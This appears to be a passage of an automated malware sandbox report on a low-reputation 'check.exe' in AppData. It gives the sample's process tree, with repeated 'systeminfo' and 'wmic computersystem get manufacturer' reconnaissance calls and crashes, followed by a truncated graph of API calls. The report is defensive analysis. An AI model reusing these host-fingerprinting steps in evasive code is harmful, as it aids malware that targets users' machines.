                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff60b120000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                              Start time:11:11:23
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                              Imagebase:0x7ff60ae30000
                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:11:11:23
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:11:11:24
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff60b120000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                              Start time:11:11:24
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                              Imagebase:0x7ff7dd0e0000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:11:11:25
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:11:11:25
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                              Imagebase:0x7ff7a1420000
                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:11:11:27
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff60b120000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                              Start time:11:11:34
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 8060 -s 892
                                                                                                                                                                                                              Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                              Start time:11:11:36
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                              Imagebase:0x7ff60ae30000
                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:11:11:36
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                              Start time:11:11:37
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff60b120000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:11:11:37
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                              Imagebase:0x7ff7dd0e0000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                              Start time:11:11:38
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:11:11:38
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                              Imagebase:0x7ff7a1420000
                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:11:11:41
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 5112 -s 956
                                                                                                                                                                                                              Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:11:11:44
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                              Imagebase:0x7ff60ae30000
                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                              Start time:11:11:44
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:11:11:45
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                              Imagebase:0x7ff7dd0e0000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                              Start time:11:11:45
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:11:11:45
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                              Imagebase:0x7ff7a1420000
                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                              Start time:11:11:48
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7608 -s 928
                                                                                                                                                                                                              Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:10.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:20%
                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                Total number of Limit Nodes:72
                                                                                                                                                                                                                execution_graph 19506 7ff60b12bae0 19507 7ff60b12bb0e 19506->19507 19508 7ff60b12baf5 19506->19508 19508->19507 19510 7ff60b13d5fc 12 API calls 19508->19510 19509 7ff60b12bb6e 19510->19509 19511 7ff60b139961 19512 7ff60b13a3d8 45 API calls 19511->19512 19513 7ff60b139966 19512->19513 19514 7ff60b1399d7 19513->19514 19515 7ff60b13998d GetModuleHandleW 19513->19515 19523 7ff60b139864 19514->19523 19515->19514 19521 7ff60b13999a 19515->19521 19521->19514 19537 7ff60b139a88 GetModuleHandleExW 19521->19537 19543 7ff60b1402d8 EnterCriticalSection 19523->19543 19538 7ff60b139abc GetProcAddress 19537->19538 19539 7ff60b139ae5 19537->19539 19540 7ff60b139ace 19538->19540 19541 7ff60b139aea FreeLibrary 19539->19541 19542 7ff60b139af1 19539->19542 19540->19539 19541->19542 19542->19514 20429 7ff60b14abe3 20430 7ff60b14abf3 20429->20430 20433 7ff60b135478 LeaveCriticalSection 20430->20433 20292 7ff60b14ad69 20295 7ff60b135478 LeaveCriticalSection 20292->20295 17022 7ff60b12cc3c 17043 7ff60b12ce0c 17022->17043 17025 7ff60b12cd88 17197 7ff60b12d12c IsProcessorFeaturePresent 17025->17197 17026 7ff60b12cc58 __scrt_acquire_startup_lock 17028 7ff60b12cd92 17026->17028 17034 7ff60b12cc76 __scrt_release_startup_lock 17026->17034 17029 7ff60b12d12c 7 API calls 17028->17029 17031 7ff60b12cd9d __FrameHandler3::FrameUnwindToEmptyState 17029->17031 17030 7ff60b12cc9b 17032 7ff60b12cd21 17049 7ff60b12d274 17032->17049 17034->17030 17034->17032 17186 7ff60b139b2c 17034->17186 17035 7ff60b12cd26 17052 7ff60b121000 17035->17052 17040 7ff60b12cd49 17040->17031 17193 7ff60b12cf90 17040->17193 17044 7ff60b12ce14 17043->17044 17045 7ff60b12ce20 __scrt_dllmain_crt_thread_attach 17044->17045 17046 7ff60b12cc50 17045->17046 17047 7ff60b12ce2d 17045->17047 17046->17025 17046->17026 17047->17046 17204 7ff60b12d888 17047->17204 17050 7ff60b14a4d0 memcpy_s 17049->17050 17051 7ff60b12d28b GetStartupInfoW 17050->17051 17051->17035 17053 7ff60b121009 17052->17053 17231 7ff60b135484 17053->17231 17055 7ff60b1237fb 17238 7ff60b1236b0 17055->17238 17059 7ff60b12c550 _log10_special 8 API calls 17061 7ff60b123ca7 17059->17061 17191 7ff60b12d2b8 GetModuleHandleW 17061->17191 17062 7ff60b12391b 17407 7ff60b1245c0 17062->17407 17063 7ff60b12383c 17398 7ff60b121c80 17063->17398 17066 7ff60b12385b 17310 7ff60b128830 17066->17310 17069 7ff60b12396a 17430 7ff60b122710 17069->17430 17070 7ff60b12388e 17080 7ff60b1238bb __vcrt_freefls 17070->17080 17402 7ff60b1289a0 17070->17402 17073 7ff60b12395d 17074 7ff60b123962 17073->17074 17075 7ff60b123984 17073->17075 17426 7ff60b13004c 17074->17426 17076 7ff60b121c80 49 API calls 17075->17076 17079 7ff60b1239a3 17076->17079 17084 7ff60b121950 115 API calls 17079->17084 17081 7ff60b128830 14 API calls 17080->17081 17088 7ff60b1238de __vcrt_freefls 17080->17088 17081->17088 17083 7ff60b123a0b 17085 7ff60b1289a0 40 API calls 17083->17085 17087 7ff60b1239ce 17084->17087 17086 7ff60b123a17 17085->17086 17089 7ff60b1289a0 40 API calls 17086->17089 17087->17066 17090 7ff60b1239de 17087->17090 17094 7ff60b12390e __vcrt_freefls 17088->17094 17441 7ff60b128940 17088->17441 17091 7ff60b123a23 17089->17091 17092 7ff60b122710 54 API calls 17090->17092 17093 7ff60b1289a0 40 API calls 17091->17093 17176 7ff60b123808 __vcrt_freefls 17092->17176 17093->17094 17095 7ff60b128830 14 API calls 17094->17095 17096 7ff60b123a3b 17095->17096 17097 7ff60b123b2f 17096->17097 17098 7ff60b123a60 __vcrt_freefls 17096->17098 17099 7ff60b122710 54 API calls 17097->17099 17100 7ff60b128940 40 API calls 17098->17100 17105 7ff60b123aab 17098->17105 17099->17176 17100->17105 17101 7ff60b128830 14 API calls 17102 7ff60b123bf4 __vcrt_freefls 17101->17102 17103 7ff60b123c46 17102->17103 17104 7ff60b123d41 17102->17104 17106 7ff60b123c50 17103->17106 17107 7ff60b123cd4 17103->17107 17448 7ff60b1244e0 17104->17448 17105->17101 17323 7ff60b1290e0 17106->17323 17110 7ff60b128830 14 API calls 17107->17110 17115 7ff60b123ce0 17110->17115 17111 7ff60b123d4f 17112 7ff60b123d71 17111->17112 17113 7ff60b123d65 17111->17113 17118 7ff60b121c80 49 API calls 17112->17118 17451 7ff60b124630 17113->17451 17116 7ff60b123c61 17115->17116 17119 7ff60b123ced 17115->17119 17121 7ff60b122710 54 API calls 17116->17121 17127 7ff60b123cc8 __vcrt_freefls 17118->17127 17122 7ff60b121c80 49 API calls 17119->17122 17121->17176 17125 7ff60b123d0b 17122->17125 17123 7ff60b123dc4 17373 7ff60b129390 17123->17373 17125->17127 17128 7ff60b123d12 17125->17128 17127->17123 17129 7ff60b123da7 SetDllDirectoryW LoadLibraryExW 17127->17129 17131 7ff60b122710 54 API calls 17128->17131 17129->17123 17130 7ff60b123dd7 SetDllDirectoryW 17133 7ff60b123e0a 17130->17133 17174 7ff60b123e5a 17130->17174 17131->17176 17134 7ff60b128830 14 API calls 17133->17134 17142 7ff60b123e16 __vcrt_freefls 17134->17142 17135 7ff60b124008 17137 7ff60b124012 PostMessageW GetMessageW 17135->17137 17138 7ff60b124035 17135->17138 17136 7ff60b123f1b 17378 7ff60b1233c0 17136->17378 17137->17138 17528 7ff60b123360 17138->17528 17144 7ff60b123ef2 17142->17144 17149 7ff60b123e4e 17142->17149 17148 7ff60b128940 40 API calls 17144->17148 17148->17174 17149->17174 17454 7ff60b126dc0 17149->17454 17174->17135 17174->17136 17176->17059 17187 7ff60b139b64 17186->17187 17188 7ff60b139b43 17186->17188 19447 7ff60b13a3d8 17187->19447 17188->17032 17192 7ff60b12d2c9 17191->17192 17192->17040 17194 7ff60b12cfa1 17193->17194 17195 7ff60b12cd60 17194->17195 17196 7ff60b12d888 7 API calls 17194->17196 17195->17030 17196->17195 17198 7ff60b12d152 _isindst memcpy_s 17197->17198 17199 7ff60b12d171 RtlCaptureContext RtlLookupFunctionEntry 17198->17199 17200 7ff60b12d1d6 memcpy_s 17199->17200 17201 7ff60b12d19a RtlVirtualUnwind 17199->17201 17202 7ff60b12d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17200->17202 17201->17200 17203 7ff60b12d256 _isindst 17202->17203 17203->17028 17205 7ff60b12d89a 17204->17205 17206 7ff60b12d890 17204->17206 17205->17046 17210 7ff60b12dc24 17206->17210 17211 7ff60b12d895 17210->17211 17212 7ff60b12dc33 17210->17212 17214 7ff60b12dc90 17211->17214 17218 7ff60b12de60 17212->17218 17215 7ff60b12dcbb 17214->17215 17216 7ff60b12dc9e DeleteCriticalSection 17215->17216 17217 7ff60b12dcbf 17215->17217 17216->17215 17217->17205 17222 7ff60b12dcc8 17218->17222 17223 7ff60b12ddb2 TlsFree 17222->17223 17228 7ff60b12dd0c __vcrt_FlsAlloc 17222->17228 17224 7ff60b12dd3a LoadLibraryExW 17226 7ff60b12ddd9 17224->17226 17227 7ff60b12dd5b GetLastError 17224->17227 17225 7ff60b12ddf9 GetProcAddress 17225->17223 17226->17225 17229 7ff60b12ddf0 FreeLibrary 17226->17229 17227->17228 17228->17223 17228->17224 17228->17225 17230 7ff60b12dd7d LoadLibraryExW 17228->17230 17229->17225 17230->17226 17230->17228 17232 7ff60b13f480 17231->17232 17234 7ff60b13f526 17232->17234 17235 7ff60b13f4d3 17232->17235 17233 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17237 7ff60b13f4fc 17233->17237 17541 7ff60b13f358 17234->17541 17235->17233 17237->17055 17549 7ff60b12c850 17238->17549 17241 7ff60b1236eb GetLastError 17556 7ff60b122c50 17241->17556 17242 7ff60b123710 17551 7ff60b129280 FindFirstFileExW 17242->17551 17246 7ff60b12377d 17582 7ff60b129440 17246->17582 17247 7ff60b123723 17571 7ff60b129300 CreateFileW 17247->17571 17249 7ff60b12c550 _log10_special 8 API calls 17251 7ff60b1237b5 17249->17251 17251->17176 17260 7ff60b121950 17251->17260 17253 7ff60b12378b 17255 7ff60b123706 17253->17255 17258 7ff60b122810 49 API calls 17253->17258 17254 7ff60b123734 17574 7ff60b122810 17254->17574 17255->17249 17257 7ff60b12374c __vcrt_FlsAlloc 17257->17246 17258->17255 17261 7ff60b1245c0 108 API calls 17260->17261 17262 7ff60b121985 17261->17262 17263 7ff60b121c43 17262->17263 17264 7ff60b127f90 83 API calls 17262->17264 17265 7ff60b12c550 _log10_special 8 API calls 17263->17265 17266 7ff60b1219cb 17264->17266 17267 7ff60b121c5e 17265->17267 17281 7ff60b121a03 17266->17281 17927 7ff60b1306d4 17266->17927 17267->17062 17267->17063 17269 7ff60b13004c 74 API calls 17269->17263 17270 7ff60b1219e5 17271 7ff60b1219e9 17270->17271 17272 7ff60b121a08 17270->17272 17274 7ff60b134f08 _get_daylight 11 API calls 17271->17274 17931 7ff60b13039c 17272->17931 17276 7ff60b1219ee 17274->17276 17934 7ff60b122910 17276->17934 17277 7ff60b121a26 17280 7ff60b134f08 _get_daylight 11 API calls 17277->17280 17278 7ff60b121a45 17284 7ff60b121a7b 17278->17284 17285 7ff60b121a5c 17278->17285 17282 7ff60b121a2b 17280->17282 17281->17269 17283 7ff60b122910 54 API calls 17282->17283 17283->17281 17286 7ff60b121c80 49 API calls 17284->17286 17287 7ff60b134f08 _get_daylight 11 API calls 17285->17287 17288 7ff60b121a92 17286->17288 17289 7ff60b121a61 17287->17289 17290 7ff60b121c80 49 API calls 17288->17290 17291 7ff60b122910 54 API calls 17289->17291 17292 7ff60b121add 17290->17292 17291->17281 17293 7ff60b1306d4 73 API calls 17292->17293 17294 7ff60b121b01 17293->17294 17295 7ff60b121b16 17294->17295 17296 7ff60b121b35 17294->17296 17297 7ff60b134f08 _get_daylight 11 API calls 17295->17297 17298 7ff60b13039c _fread_nolock 53 API calls 17296->17298 17300 7ff60b121b1b 17297->17300 17299 7ff60b121b4a 17298->17299 17301 7ff60b121b6f 17299->17301 17302 7ff60b121b50 17299->17302 17303 7ff60b122910 54 API calls 17300->17303 17949 7ff60b130110 17301->17949 17304 7ff60b134f08 _get_daylight 11 API calls 17302->17304 17303->17281 17306 7ff60b121b55 17304->17306 17308 7ff60b122910 54 API calls 17306->17308 17308->17281 17309 7ff60b122710 54 API calls 17309->17281 17311 7ff60b12883a 17310->17311 17312 7ff60b129390 2 API calls 17311->17312 17313 7ff60b128859 GetEnvironmentVariableW 17312->17313 17314 7ff60b128876 ExpandEnvironmentStringsW 17313->17314 17315 7ff60b1288c2 17313->17315 17314->17315 17316 7ff60b128898 17314->17316 17317 7ff60b12c550 _log10_special 8 API calls 17315->17317 17318 7ff60b129440 2 API calls 17316->17318 17319 7ff60b1288d4 17317->17319 17320 7ff60b1288aa 17318->17320 17319->17070 17321 7ff60b12c550 _log10_special 8 API calls 17320->17321 17322 7ff60b1288ba 17321->17322 17322->17070 17324 7ff60b1290f5 17323->17324 18164 7ff60b128570 GetCurrentProcess OpenProcessToken 17324->18164 17327 7ff60b128570 7 API calls 17328 7ff60b129121 17327->17328 17329 7ff60b12913a 17328->17329 17330 7ff60b129154 17328->17330 17332 7ff60b1226b0 48 API calls 17329->17332 17331 7ff60b1226b0 48 API calls 17330->17331 17333 7ff60b129167 LocalFree LocalFree 17331->17333 17334 7ff60b129152 17332->17334 17335 7ff60b12918f 17333->17335 17336 7ff60b129183 17333->17336 17334->17333 17338 7ff60b12c550 _log10_special 8 API calls 17335->17338 18174 7ff60b122b50 17336->18174 17339 7ff60b123c55 17338->17339 17339->17116 17340 7ff60b128660 17339->17340 17341 7ff60b128678 17340->17341 17342 7ff60b12869c 17341->17342 17343 7ff60b1286fa GetTempPathW GetCurrentProcessId 17341->17343 17345 7ff60b128830 14 API calls 17342->17345 18183 7ff60b1225c0 17343->18183 17346 7ff60b1286a8 17345->17346 18190 7ff60b1281d0 17346->18190 17352 7ff60b128728 __vcrt_freefls 17360 7ff60b128765 __vcrt_freefls 17352->17360 18187 7ff60b138b68 17352->18187 17364 7ff60b129390 2 API calls 17360->17364 17372 7ff60b1287d4 __vcrt_freefls 17360->17372 17374 7ff60b1293b2 MultiByteToWideChar 17373->17374 17376 7ff60b1293d6 17373->17376 17374->17376 17377 7ff60b1293ec __vcrt_freefls 17374->17377 17375 7ff60b1293f3 MultiByteToWideChar 17375->17377 17376->17375 17376->17377 17377->17130 17384 7ff60b1233ce memcpy_s 17378->17384 17379 7ff60b1235c7 17380 7ff60b12c550 _log10_special 8 API calls 17379->17380 17381 7ff60b123664 17380->17381 17381->17176 17397 7ff60b1290c0 LocalFree 17381->17397 17383 7ff60b121c80 49 API calls 17383->17384 17384->17379 17384->17383 17389 7ff60b1235c9 17384->17389 17391 7ff60b1235e2 17384->17391 17392 7ff60b122a50 54 API calls 17384->17392 17395 7ff60b1235d0 17384->17395 18370 7ff60b124560 17384->18370 18376 7ff60b127e20 17384->18376 18387 7ff60b121600 17384->18387 18435 7ff60b127120 17384->18435 18439 7ff60b124190 17384->18439 18483 